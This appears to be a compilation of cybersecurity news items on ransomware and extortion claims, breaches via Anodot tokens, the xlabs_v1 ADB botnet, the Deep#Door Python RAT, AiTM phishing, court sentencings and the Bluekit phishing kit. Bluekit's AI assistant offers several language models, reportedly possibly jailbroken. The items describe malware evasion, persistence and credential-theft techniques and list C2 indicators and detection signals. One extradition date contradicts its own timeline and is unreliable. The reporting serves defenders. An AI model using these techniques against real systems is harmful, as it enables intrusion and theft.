RansomHouse claimed responsibility for the Trellix breach, adding the security firm to its Tor data leak site and sharing screenshots of internal systems.
The RansomHouse ransomware group has claimed responsibility for the recent cyberattack on cybersecurity firm Trellix. To support its claims, the gang published screenshots allegedly showing access to internal Trellix services.
In early May, the company revealed a breach that allowed unauthorized access to part of its source code repository. The cybersecurity firm said it quickly launched an investigation with forensic experts and notified law enforcement. While the exact data accessed remains unclear, Trellix stated there is no evidence that its source code has been altered or exploited.
“Trellix recently identified unauthorized access to a portion of our source code repository. Upon learning of this matter, we immediately began working with leading forensic experts to resolve it. We have also notified law enforcement.” reads the update published by the security firm. “Based on our investigation to date, we have found no evidence that our source code release or distribution process was affected, or that our source code has been exploited. As part of our commitment to our broader security community, we intend to share further details as appropriate once our investigation is complete.”
The company did not disclose who carried out the attack and how he did it. It is unclear how long attackers had gained access to the repository.
Unauthorized access to part of a source code repository can expose sensitive logic, APIs, or credentials. Attackers may study the code to find vulnerabilities, create exploits, or plan targeted attacks. It can also lead to intellectual property theft, reputational damage, and supply chain risks if tampered code is later distributed to customers or partners.
The cybersecurity firm confirmed that part of its source code repository was breached, but said there is currently no evidence that its code release process or products were compromised.
RansomHouse is a cyber extortion group that emerged in late 2021 and quickly gained attention for targeting large organizations worldwide. Unlike traditional ransomware gangs, it initially focused on stealing data and extorting victims rather than encrypting systems.
The group presents itself as a “professional mediator” exposing poor cybersecurity practices, although researchers classify it as a financially motivated criminal operation. RansomHouse has been linked to attacks on healthcare providers, retailers, government agencies, technology firms, and critical infrastructure operators, claiming breaches involving AMD, Shoprite, and European institutions. The gang typically exploits exposed services, weak credentials, phishing, and vulnerable remote access systems.
Nearly 200,000 Zara customers were exposed in a third-party breach linked to ShinyHunters, revealing emails, purchase history, and support data.
Personal data belonging to nearly 197,000 Zara customers has been compromised following a cyberattack on a former technology provider used by Inditex, the Spanish fashion giant behind some of the world’s most recognized retail brands including Bershka, Pull&Bear, and Massimo Dutti.
The breach came to light last month when Inditex confirmed unauthorized access to databases hosted by a third-party vendor. The company was careful to limit the alarm: the compromised databases did not contain names, passwords, payment details, addresses, or phone numbers.
“Inditex has immediately applied its security protocols and has started notifying the relevant authorities of this unauthorized access, that stems from a security incident that affected a former technology provider and has impacted several companies operating internationally,” reads a statement by Inditex.
“Operations and systems haven’t been affected and customers can continue to access and use its services safely,”
What was exposed, however, tells a different story about the scale of the incident.
The data breach notification service Have I Been Pwned analyzed the stolen dataset and confirmed that 197,400 unique email addresses were among the compromised records, alongside order IDs, product SKUs, geographic locations, purchase history, and customer support tickets, enough to paint a detailed picture of individual shopping habits and interactions with the brand.
The extortion group ShinyHunters claimed the attack and the theft of a 140GB archive from BigQuery instances by exploiting compromised Anodot authentication tokens, the same technique they have used against dozens of other companies.
“Your Bigquery instances data was compromised thanks to Anodot.com.” the cybercrime group wrote on its Tor data leak site. “The company failed to reach an agreement with us despite our incredible patience, all the chances”
The Anodot vector is significant. ShinyHunters has told journalists that stolen Anodot tokens gave them access to analytics infrastructure across multiple large organizations simultaneously, a single point of failure that cascaded into dozens of separate breaches. The gang has also run coordinated vishing campaigns targeting employees’ SSO accounts at Microsoft Entra, Okta, and Google to move laterally into connected SaaS environments.
Inditex has not yet named the compromised provider or attributed the attack to a specific threat actor, despite ShinyHunters having publicly claimed it and released data as proof.
Zara is the flagship fashion brand of Inditex, one of the world’s largest apparel groups. Inditex reported revenue of about €38.6 billion in fiscal 2025 and employs roughly 160,000 people worldwide. Zara operates in more than 90 countries through thousands of stores and online platforms, making it one of the most globally recognized fast-fashion retailers.
Rival retailer Mango disclosed its own data breach last October, after a marketing vendor was hacked and customer data used in promotional campaigns was exposed. In that case, no extortion group has come forward, and the attackers remain unidentified.
In the second timeline of April 2026 I collected 108 events, corresponding to an average of 7.2 events per day, a number that confirms a growing trend, driven by the increasing number of supply chain attacks, compared to the previous timeline, where I collected 94 events (6.27 events/day).
A new Mirai‑based botnet, xlabs_v1, hijacks ADB‑exposed IoT devices for powerful DDoS attacks, with 21 flooding methods and DDoS‑for‑hire use.
A new Mirai‑derived botnet called xlabs_v1 is hijacking internet‑exposed devices running Android Debug Bridge (ADB) and using them for large‑scale DDoS attacks. Hunt.io discovered the bot on an unsecured server, it includes 21 flood techniques across TCP, UDP, and raw protocols, allowing it to bypass basic protections. It appears to be sold as a DDoS‑for‑hire service, especially for targeting game and Minecraft servers.
During routine monitoring, researchers spotted an exposed directory on a Netherlands‑hosted server (176.65[.]139.44) used for bulletproof hosting. The operator had left their entire toolkit publicly accessible over TCP/80 with no authentication, allowing investigators to index everything before the attacker realized it was exposed.
Open access to the server revealed a six‑file toolkit instead of a login page, exposing binaries and text files with no authentication. Two files were auto‑tagged as malicious: arm7 (Mirai) and payloads.txt (exploit content), suggesting the operator was using analyst‑grade tools on an unsecured host. The directory held about 200 KB of data, including the packed ARM bot, an unstripped x86‑64 debug build, ADB infection one‑liners, a SOCKS5 proxy, and a placeholder targets file. The debug build’s intact symbols made reconstructing the bot’s behavior straightforward.
“The xlabs_v1 codebase reads as a focused commercial product rather than an opportunistic Mirai derivative. Its twenty-one flood variants, ChaCha20 string protection, OpenNIC-aware DNS resolution, and Speedtest-driven bandwidth profiling are subsystems aimed at a single outcome: keeping a fleet of compromised IoT devices reachable, accountable, and profitable for the operator. Everything else in the binary serves that goal or protects it.” reads the report published by Hunt.io.
xlabs_v1 botnet is built entirely for commercial DDoS‑for‑hire operations, with no added features like credential theft that could increase detection risk. Its core function is to receive attack commands and launch one of 21 flood variants, many aimed at game servers, including RakNet floods for Minecraft and OpenVPN‑shaped UDP traffic to evade filters. Delivered through ADB exploits, the ARMv7 bot targets Android TVs, set‑top boxes, and IoT hardware, part of a global surface of more than 4 million devices with TCP/5555 exposed.
“nfection vector is Android Debug Bridge on TCP/5555, with multi-architecture builds covering ARM, MIPS, x86-64, ARC, and Android APK, meaning any internet-exposed device running ADB is a potential target: Android TV boxes, set-top boxes, smart TVs, residential routers, and any IoT-grade hardware shipping with ADB enabled by default.” continutes the report.
Once installed, the bot hides infection tags, profiles each device’s bandwidth by opening 8,192 TCP sockets, and reports Mbps to its panel so the operator can assign price tiers. It also kills competing botnets by scanning /proc, terminating rival processes, and removing malware on port 24936.
For resilience, xlabs_v1 resolves its C2 via OpenNIC, falls back to a firewall‑punching SOCKS‑style listener on TCP/26721, and masks itself as /bin/bash to evade casual inspection. Sensitive strings, including the C2 domain xlabslover.lol, the operator handle Tadashi, and the agent tag xlabs_v1, are encrypted with ChaCha20 but easily recovered due to key reuse.
Its command‑and‑control uses a custom TCP protocol, supporting bandwidth probes, updates, self‑restart, and attack dispatch. Together, these techniques reveal a sophisticated, commercially motivated DDoS botnet engineered for persistence, evasion, and profit.
Analysis of the xlabs_v1 botnet’s infrastructure begins with its C2 domain, xlabslover[.]lol, which resolves to a single IP in the Netherlands hosted by Offshore LC. The domain uses Ultahost nameservers, a provider often linked to bulletproof hosting, and shows no prior malware detections, suggesting a recently deployed C2.
Pivoting from the domain to its IP (176.65.139[.]134) reveals SSH as the only open port, plus past honeypot activity involving HTTP and .env‑file scanning. SSL history shows unusual self‑signed certificates, including one with the CN “Godisgood”, previously used on another IP in Germany, indicating the same operator managing multiple servers.
Three hosts within the 176.65.139.0/24 netblock appear tied to the botnet: .44 (staging), .42 (distribution), and .9 (additional distribution). Hunt.io captured open directories on these systems containing Mirai‑tagged binaries, multi‑architecture payloads, and ADB exploitation scripts.
Historical scans confirmed Mirai C2 activity in late March and early April 2026, consistent with the botnet’s active deployment period and revealing a consolidated, bulletproof infrastructure supporting xlabs_v1.
The operator behind the botnet uses the handle Tadashi, embedded in each build, while the botnet brand xlabs_v1 appears in every C2 registration, hinting at future versions. A development tag, aterna, shows earlier branding before release. OSINT searches linking “Tadashi,” “xlabs,” and “xlabslover” may reveal the operator’s DDoS‑for‑hire storefront. A decrypted banner also exposes hostility toward a rival fork, xlab 2, suggesting a code split or underground feud. Nearby infrastructure in the same netblock has hosted cryptojacking tools, though overlap with the xlabs operation remains unconfirmed.
“In commercial-criminal terms, xlabs_v1 is mid-tier. It is more sophisticated than the typical script-kiddie Mirai fork (which would lack the ChaCha20 layer, the multi-architecture binary set, the bandwidth profiling, and the registered-attack diversity), but less sophisticated than the top tier of commercial DDoS-for-hire operations (which would use TLS on the C2 channel, would not ship a debug build to production paths, would rotate cryptographic material across builds, and would not ship a hard-coded competitor-rivalry banner).” concludes the report. “This operator is competing on price and attack variety, not technical sophistication. Consumer IoT devices, residential routers, and small game-server operators are the target. Treat it accordingly.”
Romanian citizen Gavril Sandu was extradited to the U.S. nearly 17 years after a hacking scheme. He was indicted in 2017 and arrested in 2026.
Romanian national Gavril Sandu, 53, has been extradited to the United States for his role in a hacking scheme that took place 17 years ago.
“On November 14, 2017, a federal grand jury in Charlotte returned a criminal indictment charging Gavril Sandu, 53, with one count of conspiracy to commit bank fraud and one count of bank fraud. Sandu was arrested in Romania on January 9, 2026. He was extradited to the United States on April 30, 2026.” reads the press release published by DoJ.
The move closes a long-running cybercrime investigation revealed by the Justice Department.
The man appeared in a U.S. court after being extradited from Romania to face charges of bank fraud and conspiracy for his role in an international vishing scheme. Indicted in 2017, Sandu was arrested in Romania on January 9, 2026, and transferred to U.S. custody on April 30, 2026.
According to prosecutors, between May 2009 and October 2010, Sandu and co-conspirators hacked into small businesses’ VoIP systems, using them to make spoofed phone calls that impersonated banks and tricked victims into revealing debit card and PIN numbers. The stolen credentials were used to access accounts and steal funds.
“Greed crosses borders, but so does our relentless pursuit of justice,” said U.S. Attorney Russ Ferguson, emphasizing that international cyberscammers will face prosecution no matter where they operate.
The case underscores how global cooperation and timely extraditions remain vital to combating cyber-enabled financial fraud.
Investigators allege that Sandu collected these stolen credentials, used them to forge magnetic stripe cards, and acted as a money mule, withdrawing cash from compromised ATMs and bank accounts. He then split the proceeds with his co‑conspirators.
Following his extradition from Romania, Sandu was placed in federal custody awaiting trial. If convicted, he faces up to 30 years in prison.
“Scams originating outside of our country are out of control. Wherever scammers operate – here or abroad – we will use every tool available to bring them to justice.” concludes U.S. Attorney Ferguson.
Deniss Zolotarjovs was sentenced to 8.5 years in the U.S. after pleading guilty to money laundering and fraud tied to ransomware.
Deniss Zolotarjovs, a Latvian national linked to the Karakurt ransomware gang, has been sentenced to 8.5 years in U.S. prison, marking a significant step in efforts to combat global ransomware operations.
“A Latvian national was sentenced today to 102 months in prison for his role in a major Russian ransomware organization that stole from and extorted over 54 companies.” reads the press release published by DoJ.
In August 2024, the man was charged with money laundering, wire fraud, and extortion. He was arrested in Georgia in December 2023 and extradited to the U.S. in 2014.
In 2025, he pleaded guilty to money laundering and wire fraud conspiracy. Rather than carrying out technical intrusions, Zolotarjovs acted as a negotiator and strategist.
He analyzed stolen data, set ransom demands, and communicated directly with victims, earning about 10% of ransom payments through cryptocurrency laundering. Prosecutors described him as a key intermediary within a broader cybercrime ecosystem tied to former members of the Conti ransomware group.
Between 2021 and 2023, the group targeted over 54 organizations, causing over $56 million in losses. Victims included businesses, government entities, and even a pediatric healthcare provider.
“According to court documents, Deniss Zolotarjovs (Денисс Золотарёвс), 35, of Moscow, Russia, was a member of a ransomware organization led by former leaders of the Conti ransomware group. Brands used to identify the organization in ransom notes to their victims during the time of his involvement include Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, among others.” continues the press release. “During the time of Zolotarjovs’s active participation in the organization, approximately June 2021 to August 2023, the organization stole data from over 54 companies, including many in the United States. “
In one case, Zolotarjovs suggested leaking children’s medical data to pressure payment, highlighting the coercive tactics used. Another attack disrupted a U.S. 911 emergency dispatch system, underscoring the real-world impact of these operations.
“In one attack on a pediatric healthcare company, Zolotarjovs deliberately leveraged children’s health information for extortion.” DoJ states. “When he failed in extracting a ransom from this victim, he urged coconspirators to be “DESTROYERS” and to leak or sell copies of these pediatric health records to sow fear among future victims.”
Authorities say the case reflects the increasingly organized and professional nature of ransomware groups, which operate like businesses with defined roles such as negotiators, operators, and data brokers. It also demonstrates growing international cooperation, particularly between U.S. agencies and Georgian authorities, in tracking and prosecuting cybercriminals.
Officials from the Federal Bureau of Investigation emphasized that this sentencing sends a strong message: even individuals operating within Russia-linked cybercrime networks can be identified, pursued, and brought to justice. The case highlights both the human cost of ransomware attacks and the expanding reach of global law enforcement in tackling cyber extortion.
“With this sentence, a cruel, ruthless, and dangerous international cybercriminal is now behind bars,” said Assistant Attorney General A. Tysen Duva of the Justice Department’s Criminal Division. “Deniss Zolotarjovs helped his ransomware gang profit from hacks of dozens of companies, and even on a government entity whose 911 system was forced offline. He also used stolen children’s health information to increase his leverage to extort victim payments. The Criminal Division will continue to investigate and prosecute international hackers and extortionists from around the world, no matter where they live or operate.”
Accenture researchers first detailed the activity of the sophisticated financially motivated threat actor in December 2021. The group’s activity was first spotted in June 2021, but the group has been more active in Q3 2021.
Zolotarjovs is the first member of the Karakurt group to be sentenced in the United States.
Most of the known victims are based in North America, while the remaining are in Europe.
The analysis of the attack chain associated with this threat actor revealed that it primarily leverages VPN credentials to gain initial access to the target’s network.
In the initial attacks, the group gained persistence by using the popular post-exploitation tool Cobalt Strike. Later, the group switched on the VPN IP pool or AnyDesk software to establish persistence and avoid detection.
Once access is gained to the target network, the group used various tools to escalate privileges, including Mimikatz or PowerShell to steal ntds.dit that contains Active Directory data.
However, the threat group in most attacks escalated privileges using previously obtained credentials.
For data exfiltration the group used 7zip and WinZip for compression, as well as Rclone or FileZilla (SFTP) to upload data to Mega.io cloud storage.
The Karakurt cyber extortion group typically gave victims one week to pay a ransom, which ranges from $25,000 to $13 million in Bitcoin. This information comes from a joint alert issued by the FBI, CISA, the Department of the Treasury, and FinCEN.
Hackers stole data of 119,000 Vimeo users in April. The breach, linked to a third‑party vendor, exposed personal details.
Vimeo confirmed a data breach after the ShinyHunters gang stole personal information of 119,000 users in April 2026. According to Have I Been Pwned, the attackers accessed user data through a compromise at Anodot, a third‑party analytics vendor.
“In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their “pay or leak” campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata.” reported Have I Been Pwned.”The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include “Vimeo video content, valid user login credentials, or payment card information”.”
Vimeo confirmed that the security incident is linked to a breach at Anodot. An unauthorized actor accessed some Vimeo user and customer data, mainly technical information, video titles, metadata, and in some cases email addresses.
“Vimeo is aware of a security incident affecting Anodot, a third-party analytics vendor used by Vimeo and many other companies. The Google Threat Intelligence report associated with the unauthorized actor claiming responsibility for the Anodot incident can be found at this link.” reads the notice on the security incident published by the company.
We have identified that, as a result of the Anodot breach, an unauthorized actor accessed certain Vimeo user and customer data. Our initial findings suggest that the databases accessed primarily contain technical data, video titles and metadata, and, in some cases, customer email addresses.”
The company said no video content, login credentials, or payment data were exposed, and services were not disrupted. In response, Vimeo disabled Anodot access, removed the integration, engaged external security experts, and notified law enforcement.
The investigation is still ongoing, and updates will be shared as more details emerge.
After Vimeo’s disclosure, the ShinyHunters cybercrime group leaked a 106GB archive of stolen documents on its Tor data leak site.
ShinyHunters is a well-known name in the cybercriminal ecosystem. The group is associated with a broader loosely connected network often referred to as “the Com,” made up largely of young, English-speaking individuals. Their operations typically focus on stealing data from large organizations and using leak sites to pressure victims into paying ransoms in cryptocurrency.
ShinyHunters has recently targeted major companies and organizations, leaking data when ransom demands fail. Victims include the European Commission, Odido, Figure, Canada Goose, Rockstar, and SoundCloud. The group primarily uses social engineering, especially voice phishing, to steal credentials and access SaaS platforms like Salesforce, Okta, and Microsoft 365.
A Latvian national operating from Moscow has been sentenced to 102 months in federal prison for his role as a key negotiator within a prolific Russian ransomware network. Deniss Zolotarjovs, 35, participated in a cybercrime syndicate that orchestrated data theft and extortion campaigns against over 54 organizations worldwide between June 2021 and August 2023. The […]
Microsoft revealed a phishing campaign hitting 35,000 users in 26 countries, stealing login tokens via fake code-of-conduct emails and legit services.
Microsoft disclosed a major phishing campaign that targeted over 35,000 users across 26 countries in mid-April 2026.
Attackers used fake “code of conduct” emails sent through legitimate platforms to trick recipients into visiting bogus sites that stole authentication tokens.
“The campaign targeted tens of thousands of users, primarily in the United States, and directed them through several stages of CAPTCHA and intermediate staging pages designed to reinforce legitimacy while filtering out automated defenses.” reads the report published by Microsoft. “The lures in this campaign used polished, enterprise-style HTML templates with structured layouts and preemptive authenticity statements, making them appear more credible than typical phishing emails and increasing their plausibility as legitimate internal communications. “
Most victims (92%) were in the U.S., mainly in healthcare and finance.
Attackers used alarming, time-sensitive messages to pressure victims into action, leading them to a fake but legitimate-looking sign-in page. This adversary‑in‑the‑middle (AiTM) phishing flow let attackers intercept authentication tokens in real time, bypassing weak MFA. Microsoft urges training, anti-phishing tools, secure browsers, and SmartScreen protections to defend against such threats.
The phishing campaign impersonated internal compliance and regulatory departments, using subject lines like “Internal case log issued under conduct policy” to create urgency and legitimacy. Attackers distributed emails via a legitimate email delivery service, embedding links in PDF attachments that led to attacker-controlled domains such as acceptable-use-policy-calendly[.]de.
After completing fake Cloudflare CAPTCHAs, victims were asked to “Review & Sign” documents and then redirected to a deceptive Microsoft sign-in page. This final step launched an adversary‑in‑the‑middle (AiTM) attack chain that proxied authentication and captured tokens, giving immediate access to user accounts despite multifactor authentication.
“Following these steps, users were redirected to a third site hosting the final stage of the attack. Analysis of the underlying code indicates that the final destination varied depending on whether the user accessed the workflow from a mobile device or a desktop system.” continues the report.
The campaign’s structure mimicked legitimate workflow and compliance verification processes, making detection difficult. Microsoft described it as “one of the most sophisticated code-of-conduct‑themed credential theft operations observed to date,” confirming that the attackers’ methods reflected a high degree of operational planning and technical adaptability.
Microsoft recommends a layered approach to reduce risk. Organizations should review Exchange Online Protection and Defender for Office 365 settings, enable features like Zero-hour Auto Purge, Safe Links, and Safe Attachments, and use network protection and SmartScreen-enabled browsers.
User awareness training and phishing simulations are key, along with manual monitoring and removal of suspicious emails. Strong authentication is essential, including MFA or passwordless methods, plus conditional access for privileged accounts.
Finally, enabling automated attack disruption in Defender XDR can help detect and contain threats quickly, limiting their impact.
Instructure, maker of the Canvas learning platform, is investigating a cyber incident that exposed users’ personal data.
Instructure is a U.S.-based educational technology company best known for developing Canvas, one of the world’s most widely used learning management systems (LMS).
The U.S. firm confirrmed a cybersecurity incident that exposed users’ personal information. The company is working with external cybersecurity experts and law enforcement to investigate the breach. Canvas is widely used by schools and universities to manage courses, assignments, and online learning, raising concerns about student and staff data security.
The company says the security incident appears to be contained while investigations continue. Instructure revoked privileged credentials and access tokens, deployed security patches, rotated some keys as a precaution, and increased monitoring across systems.
“Out of an abundance of caution, we rotated certain keys, even though there is no evidence they were misused – Implemented increased monitoring across all platforms.” reads the Incident Report. “While we continue actively investigating, thus far, indications are that the information involved consists of certain identifying information of users at affected institutions, such as names, email addresses, and student ID numbers, as well as messages among users. At this time, we have found no evidence that passwords, dates of birth, government identifiers, or financial information were involved.”
So far, the exposed data likely includes user identifiers such as names, email addresses, student ID numbers, and some user messages. The company states that there is currently no evidence that passwords, dates of birth, government IDs, or financial data were affected.
The educational technology firm continues to monitor the situation and will notify institutions if new findings emerge, while updating its status page and working to strengthen system security.
Instructure did not share details about the attack, however, the ShinyHunters extortion group claimed responsibility for the attack and added the company to its Tor data leak site.
“Nearly 9,000 schools worldwide affected. 275 million individuals data ranging from students, teachers, and other staff containing PII. Several billions of private messages among students and teachers and students and other students involved, containing personal conversations and other PII. Your Salesforce instance was also breached and a lot more other data is involved. Pay or Leak.” the group wrote on its leak site. “This is a final warning to reach out by 6 May 2026 before we leak along with several annoying (digital) problems that’ll come your way. Make the right decision, don’t be the next headline.,” reads the data leak site.
Bluekit is a new phishing kit with AI features, automated domain setup, and tools like spoofing, voice cloning, and 40+ attack templates.
Bluekit is a newly discovered phishing kit still in development that includes advanced features such as an AI assistant and automated domain registration. According to Varonis, it offers over 40 website templates along with tools for spoofing, voice cloning, antibot protection, geolocation tricks, and two-factor authentication bypass support.
“Varonis Threat Labs recently discovered Bluekit, a new phishing kit pitching a broader model. It advertises 40+ website templates, automated domain purchase and registration, 2FA support, spoofing, geolocation emulation, Telegram and browser notifications, antibot cloaking, and add-ons like an AI assistant, voice cloning, and a mail sender.” reads the report published by Varonis.
Bluekit supports multiple phishing templates targeting major services such as iCloud, Apple ID, Gmail, Outlook, Yahoo, ProtonMail, GitHub, Twitter, Zoho, Zara, and Ledger. It combines email, cloud, crypto, and developer platforms in one kit.
The researchers accessed Bluekit to analyze its internal dashboard, which centralizes phishing operations in a single interface. Operators can create campaigns, register or link domains, manage captured credentials, and send stolen data via Telegram.
The kit also includes a site-builder where users select domains, templates, and target brands. It provides detailed control over phishing pages, including login detection, redirects, anti-analysis checks, spoofing, and device filtering.
Bluekit tracks sessions in real time, storing cookies and login data, and displays post-login activity. Overall, it acts as a full phishing platform rather than a simple credential-stealing tool.
Bluekit includes an AI Assistant panel with multiple model options such as Llama (default), GPT-4.1, Claude Sonnet 4, Gemini, and DeepSeek variants.
The researcher noted that in testing, only the default Llama model was usable, while the others appeared but required extra configuration, suggesting possible use of jailbroken or non-standard setups if activated in practice.
The researchers tested the assistant with a phishing scenario targeting a Microsoft 365 MFA reset for a company executive, including QR-based lures and credential-harvesting pages.
Instead of producing a ready-made phishing campaign, the AI generated only a structured draft. The output relied heavily on placeholders and generic text, requiring manual refinement.
“We expected something closer to a polished phishing copilot: a finished lure, cleaner email copy, and perhaps even a workable QR-driven flow with less manual effort. What we received was much more limited.” continues the report. “The assistant returned a structured campaign draft, and much of it relied on placeholders instead of content that looked ready to use as-is.”
Overall, the AI Assistant acts more as a tool for building campaign outlines rather than delivering fully functional phishing kits.
Bluekit has been monitored over time not just for isolated campaigns, but for how quickly it evolves. Researchers initially aimed to catch it in real-world phishing activity, but its rapid development made the release cycle itself part of the observation. New features and templates were added so frequently that tracking updates became as important as identifying active deployments.
“Compared with similar phishing kits that have already advanced further into automation and operator convenience, Bluekit still appears to be a kit in active development.” concludes the report. “The feature set keeps evolving as we track it, and if that pace continues with broader adoption, Bluekit is likely to surface in future campaigns.”
Two US security experts were sentenced to 4 years for helping ransomware attacks. A third accomplice pleaded guilty and awaits sentencing.
Two US cybersecurity professionals, Ryan Goldberg and Kevin Martin, were sentenced to four years in prison for their role in supporting ransomware attacks. Both pleaded guilty to conspiracy involving extortion. A third individual, Angelo Martino, also admitted involvement in the scheme and is currently awaiting sentencing that is scheduled for July 9. The case highlights how even security experts can take part in cybercrime activities.
“Ryan Goldberg, 40, of Georgia, and Kevin Martin, 36, of Texas, were sentenced.” reads the press release published by DoJ. “According to court documents, they and another co-conspirator, Angelo Martino, 41, of Florida, successfully deployed the ransomware known as ALPHV BlackCat between April 2023 and December 2023 against multiple victims located throughout the United States.”
In January, the two U.S. cybersecurity professionals pleaded guilty to charges tied to their roles in BlackCat/Alphv ransomware attacks that occurred in 2023.
Court records show Ryan Goldberg, Kevin Martin, and Martino deployed ALPHV BlackCat ransomware against U.S. victims from April to December 2023, sharing 20% of ransoms with operators. Despite working in cybersecurity, they extorted about $1.2M in Bitcoin from one victim, split the proceeds, and laundered the funds.
“According to court documents, Ryan Goldberg, 40, of Georgia, Kevin Martin, 36, of Texas, and another co-conspirator successfully deployed the ransomware known as ALPHV BlackCat between April 2023 and December 2023 against multiple victims located throughout the United States.” reads the press release published by DoJ. “All three men worked in the cybersecurity industry — meaning that they had special skills and experience in securing computer systems against harm, including the type of harm they themselves were committing against the victims in this case.”
In November, U.S. prosecutors charged Ryan Clifford Goldberg, Kevin Tyler Martin, and another Florida-based accomplice (aka “Co-Conspirator 1”) for using BlackCat ransomware to hack and extort five U.S. companies in 2023.
Between May and November 2023, the defendants carried out ransomware attacks on five U.S. companies, demanding different ransom sums from each target: approximately $10 million from a medical device company (which ultimately paid about $1.27 million in cryptocurrency), an unspecified amount from a Maryland-based pharmaceutical firm, $5 million from a California doctor’s office, $1 million from a California engineering company, and $300,000 from a Virginia-based drone manufacturer.
While only the medical device firm paid, the others refused.
Ryan Clifford Goldberg is a former incident response manager at cybersecurity firm Sygnia. Kevin Tyler Martin was a ransomware threat negotiator for cybersecurity firm DigitalMint at the time of the alleged conspiracy.
DigitalMint denied any misconduct, dismissed the two employees, and fully cooperated with investigators.
In October 2025, the DOJ indicted CLIFFORD GOLDBERG and KEVIN TYLER MARTIN for hacking and extortion in attacks on at least five U.S. companies.
“According to an affidavit filed in September by an FBI agent, the three men began using malicious software in May 2023 “to conduct ransomware attacks against victims,” first hitting a medical company in Florida by locking its servers and demanding $10 million to unlock the systems, court records say.” reported the Chicago Sun Times. “The FBI agent noted the men ultimately made off with $1.2 million, although it was apparently the only successful attack.”
The FBI said their scheme ran until April 2025. Goldberg admitted to helping launder $1.2M in crypto from a medical firm through mixers and wallets to hide the funds. He claimed debt drove him to join and later feared life imprisonment. After learning the FBI had raided a co-conspirator, Goldberg fled to Paris with his wife. Both he and Martin were indicted on October 2 for extortion and computer damage.
Martin pleaded not guilty, while Goldberg allegedly confessed to the FBI that he was recruited by an unnamed co-conspirator to “ransom some companies” to escape debt. The third individual has not yet been indicted.
Court documents say ALPHV BlackCat hit over 1,000 victims worldwide using a ransomware-as-a-service model. Developers built and maintained the malware and infrastructure, while affiliates targeted high-value victims. After ransom payments, proceeds were shared between developers and affiliates.
“Today’s sentencings show that ransomware criminals can operate anywhere, including right here in the United States, and that the FBI is actively working to track them down and dismantle their networks — wherever they exist,” said Assistant Director Brett Leatherman of the FBI’s Cyber Division. “Goldberg and Martin leveraged their technical skills and cyber security knowledge to extort millions from victims across the U.S., but the FBI’s global reach ensured that they ultimately faced justice. When Goldberg sought to flee abroad and escape prosecution, the FBI tracked him through 10 countries, demonstrating the lengths we will go to hold cyber criminals accountable and protect victims. The FBI thanks our DOJ partners for their help securing today’s outcome.”
Deep#Door hides a Python RAT inside a batch file, kills Windows defenses, survives via multiple persistence methods, and exfiltrates data through a public TCP tunnel.
Security researchers at Securonix uncovered a sophisticated malware campaign called Deep#Door. Threat actors employed a stealthy Python-based backdoor that uses a surprisingly simple delivery method to achieve deep, persistent access on Windows systems. What makes the campaign stand out is not just what it can do, but how cleverly it avoids being caught doing it.
“Unlike traditional malware loaders that rely on external payload downloads, Deep#Door embeds its Python implant directly inside the dropper script and reconstructs it in-memory and on disk during execution.” reads the report published by Securonix. “The implant then establishes communication with attacker infrastructure hosted on bore[.]pub, a publicly available TCP tunneling service, enabling stealthy remote access without exposing dedicated C2 servers.”
The attacK chain starts with a single batch file: install_obf.bat. When executed, this script reads itself, literally parsing its own contents to extract a hidden Python payload embedded directly inside the script. The extracted file, svc.py, is then written quietly to %LOCALAPPDATA%\SystemServices\, a folder name deliberately chosen to blend in with legitimate Windows components.
This self-referential technique is a key reason the malware is hard to catch early. There are no suspicious downloads, no external URLs being contacted at the staging phase, and no compiled executables to flag. It’s all happening within a script that looks, at first glance, like a routine maintenance tool.
Before doing anything else, the loader systematically dismantles the host’s defenses: Windows Defender is disabled, PowerShell logging is turned off, firewall logging is suppressed, and SmartScreen is bypassed. By the time the Python implant activates, the system is effectively blind.
“The malware incorporates numerous advanced anti-analysis and defense evasion mechanisms including sandbox detection, AMSI and ETW patching, ntdll unhooking, Windows Defender tampering, command-line wiping, timestamp stomping, and log clearing.” continues the report.
Deep#Door doesn’t rely on a single method to survive reboots. It plants itself across multiple locations simultaneously, the Windows Startup folder, registry Run keys, scheduled tasks, and even WMI event subscriptions. On top of that, a background watchdog thread constantly monitors these persistence points and automatically restores any that get deleted.
In practice, this means that simply removing one artifact doesn’t clean the infection. All mechanisms need to be addressed at the same time, which makes manual remediation unusually difficult.
Before fully activating, the malware runs a series of checks to determine whether it’s running on a real machine or inside an analysis environment. It looks for debuggers, virtual machine signatures, sandbox indicators like generic usernames or low system resources, and even security research tools like Wireshark or IDA Pro.
If anything looks suspicious, the malware holds back. This helps it evade automated scanning platforms, which typically analyze samples in virtual or sandboxed environments.
For command-and-control, Deep#Door takes an unconventional approach. Instead of connecting to a dedicated attacker server, which would be easier to detect and block, it uses bore.pub, a legitimate public TCP tunneling service.
The malware scans a dynamic range of ports to find an active tunnel, authenticates using a challenge-response mechanism, and establishes a covert channel that looks like ordinary tunneling traffic.
“Instead of relying on a traditional C2 server, the malware leverages bore.pub,” states the cybersecurity firm, “a public TCP tunneling service:
Allows attackers to expose internal services to the internet without opening firewall ports
Eliminates the need for attacker-owned infrastructure
Blends malicious traffic with legitimate tunneling usage
This significantly complicates attribution and network-based detection, as traffic appears to connect to a legitimate service.”
This makes attribution harder and network-based detection less reliable, since the traffic blends with legitimate use of the same service.
Once active, the implant is a fully featured remote access tool. Operators can execute shell commands, capture screenshots, record audio, log keystrokes, access the webcam, harvest stored passwords from browsers, steal SSH keys and cloud credentials, and scan internal networks. At the destructive end, it can also overwrite the Master Boot Record or force a system crash, these capabilities that suggest it could shift from espionage to sabotage if needed.
Securonix recommends focusing detection efforts on behavioral signals rather than file signatures: PowerShell commands that reference %~f0 (a self-file marker), file writes to SystemServices directories, modifications to Defender settings or event log services, and outbound connections to bore.pub across ports 41234–41243.
“Deep#Door highlights the continued evolution of threat actors toward fileless, script-driven intrusion frameworks that rely heavily on native system components and interpreted languages like Python. By embedding the payload directly within the dropper and extracting it at runtime, the malware significantly reduces external dependencies and limits traditional detection opportunities.” concludes the report.
“The use of public tunneling infrastructure (bore[.]pub) further eliminates the need for dedicated attacker-controlled servers, enabling covert and resilient command-and-control communications that blend with legitimate traffic patterns.”
The FBI warns of rising cyber cargo theft, with hackers targeting brokers and carriers. Experts say digital attacks are replacing traditional cargo theft.
